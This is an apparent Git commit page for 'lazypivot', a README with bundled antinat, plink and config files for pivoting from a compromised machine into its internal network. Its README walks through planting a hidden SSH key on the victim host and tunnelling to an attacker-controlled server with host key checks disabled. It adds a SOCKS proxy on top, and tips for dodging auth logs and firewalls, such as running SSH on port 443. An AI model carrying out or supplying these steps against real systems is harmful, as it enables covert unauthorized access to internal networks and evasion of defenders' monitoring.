g/lazypivot
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

fast release

Browse Source
This commit is contained in:
Giulio 2019-12-14 19:54:14 +01:00
commit 9807d3fcb5
7 changed files with 82 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
Readme.md Normal file
View File

@ -0,0 +1,61 @@
# Lazypivot
Making pivoting into internal networks easier and faster so you can focus on the real fun :)
## Principles
The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
## Linux
### Simpler
On our server
```
useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey
```
Copy the content of /tmp/sshkey
On the compromised host
```
echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
```
Now on your server
```
ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
```
### Stealthier
We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
## Windows
Upload the package and extract it with 7z.exe.
Start the antinat binary, no admin permissions are required:
```
antinat.exe -a -cantinat.xml
```
Forward the antinat port with plink:
```
plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
```
## Tips
* Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
* [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)

1
linux/Readme.md Normal file
View File

@ -0,0 +1 @@
Antinat linux build TODO

BIN
windows/antinat.dll Executable file
View File

Binary file not shown.

BIN
windows/antinat.exe Executable file
View File

Binary file not shown.

20
windows/antinat.xml Executable file
View File

@ -0,0 +1,20 @@
<?xml version='1.0'?>
<antinatconfig>
<!-- Any interface -->
<interface value='127.0.0.1'/>
<!-- Port to listen on -->
<port value='32768'/>
<!-- What security methods do we offer clients? -->
<authchoice>
<select mechanism='anonymous'/>
<select mechanism='chap'/>
<select mechanism='cleartext'/>
</authchoice>
<!-- Which connections should we accept or reject? -->
<filter>
<accept/>
</filter>
</antinatconfig>

BIN
windows/plink.exe Executable file
View File

Binary file not shown.

BIN
windows/upload.zip Normal file
View File

Binary file not shown.